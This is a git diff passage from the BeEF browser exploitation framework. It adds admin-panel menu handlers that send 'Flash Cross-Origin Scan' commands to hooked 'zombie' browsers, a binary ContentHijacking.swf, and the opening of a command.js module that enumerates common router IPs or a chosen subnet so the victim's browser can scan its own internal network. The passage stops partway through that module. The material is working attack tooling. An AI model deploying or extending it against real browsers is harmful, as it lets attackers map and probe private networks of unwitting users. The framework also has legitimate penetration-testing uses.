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 literal 0 HcmV?d00001 diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js index 98904eb12..df6441b29 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js @@ -468,7 +468,75 @@ ZombieTab_Network = function(zombie) { } }] } - }] + },{ + text: 'Flash Cross-Origin Scan', + iconCls: 'network-host-ctxMenu-flash', + menu: { + xtype: 'menu', + items: [{ + text: 'Common LAN IPs', + iconCls: 'network-host-ctxMenu-network', + handler: function() { + var mod_name = "cross_origin_scanner_flash"; + var mod_id = get_module_id(mod_name); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Flash cross-origin scanning commonly used local area network IP addresses [ports: '+ports+'] ...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":"common","ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']'); + } + }); + } + },{ + text: 'Specify IP Range', + iconCls: 'network-host-ctxMenu-config', + handler: function() { + var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254'); + if (!ip_range) { + commands_statusbar.update_fail('Cancelled'); + return; + } + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + var mod_name = "cross_origin_scanner_flash"; + var mod_id = get_module_id(mod_name); + commands_statusbar.update_sending('Flash cross-origin scanning ' + ip_range + ' [ports: ' + ports + '] ...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip_range,"ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']'); + } + }); + } + }] + } + }] }); emptygrid_menu.showAt(e.getXY()); }, @@ -562,6 +630,33 @@ ZombieTab_Network = function(zombie) { } }); } + },{ + text: 'Flash Cross-Origin Scan', + iconCls: 'network-host-ctxMenu-flash', + handler: function() { + var mod_id = get_module_id("cross_origin_scanner_flash"); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Flash cross-origin scanning ' + ip + ' [ports: '+ports+'] ...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } },{ text: 'Port Scan', iconCls: 'network-host-ctxMenu-network', @@ -798,6 +893,67 @@ ZombieTab_Network = function(zombie) { } }] } + },{ + text: 'Flash Cross-Origin Scan', + iconCls: 'network-host-ctxMenu-cors', + menu: { + xtype: 'menu', + items: [{ + text: 'Host ('+ip+')', + iconCls: 'network-host-ctxMenu-host', + handler: function() { + var mod_id = get_module_id("cross_origin_scanner_flash"); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Flash cross-origin scanning ' + ip + ' [ports: '+ports+'] ...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip+'-'+ip,"ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } + },{ + text: 'Network ('+class_c+'.0/24)', + iconCls: 'network-host-ctxMenu-network', + handler: function() { + var mod_id = get_module_id("cross_origin_scanner_flash"); + var ports = prompt("Enter ports to scan:", '80,8080'); + if (!ports) { + commands_statusbar.update_fail('Cancelled'); + return; + } + commands_statusbar.update_sending('Flash cross-origin scanning ' + ip_range + ' [ports: '+ports+'] ...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange":ip_range,"ports":ports}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function(data){ + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function(){ + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }] + } },{ text: 'Port Scan', iconCls: 'network-host-ctxMenu-network', diff --git a/modules/network/cross_origin_scanner_flash/ContentHijacking.swf b/modules/network/cross_origin_scanner_flash/ContentHijacking.swf new file mode 100644 index 0000000000000000000000000000000000000000..e59fa523ee03a3f7f9b9ac66eb6344d33c383837 GIT binary patch literal 2881 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 literal 0 HcmV?d00001 diff --git a/modules/network/cross_origin_scanner_flash/command.js b/modules/network/cross_origin_scanner_flash/command.js new file mode 100644 index 000000000..10580414f --- /dev/null +++ b/modules/network/cross_origin_scanner_flash/command.js @@ -0,0 +1,169 @@ +// +// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var ips = new Array(); + var ipRange = "<%= @ipRange %>"; + var ports = "<%= @ports %>"; + var threads = "<%= @threads %>"; + var timeout = <%= @timeout %>*1000; + var wait = 2; + + if(!beef.browser.hasFlash()) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support Flash', beef.are.status_error()); + return; + } + + // set target ports + if (ports != null) { + ports = ports.split(','); + } + + // set target IP addresses + if (ipRange == 'common') { + // use default IPs + ips = [ + '192.168.0.1', + '192.168.0.100', + '192.168.0.254', + '192.168.1.1', + '192.168.1.100', + '192.168.1.254', + '10.0.0.1', + '10.1.1.1', + '192.168.2.1', + '192.168.2.254', + '192.168.100.1', + '192.168.100.254', + '192.168.123.1', + '192.168.123.254', + '192.168.10.1', + '192.168.10.254' + ]; + } else { + // set target IP range + var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$'); + if (range == null || range[1] == null) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error()); + return; + } + // ipRange will be in the form of 192.168.0.1-192.168.0.254 + // the fourth octet will be iterated. + // (only C class IP ranges are supported atm) + ipBounds = ipRange.split('-'); + lowerBound = ipBounds[0].split('.')[3]; + upperBound = ipBounds[1].split('.')[3]; + for (var i = lowerBound; i <= upperBound; i++){ + ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i; + ips.push(ipToTest); + } + } + + WorkerQueue = function(frequency) { + + var stack = []; + 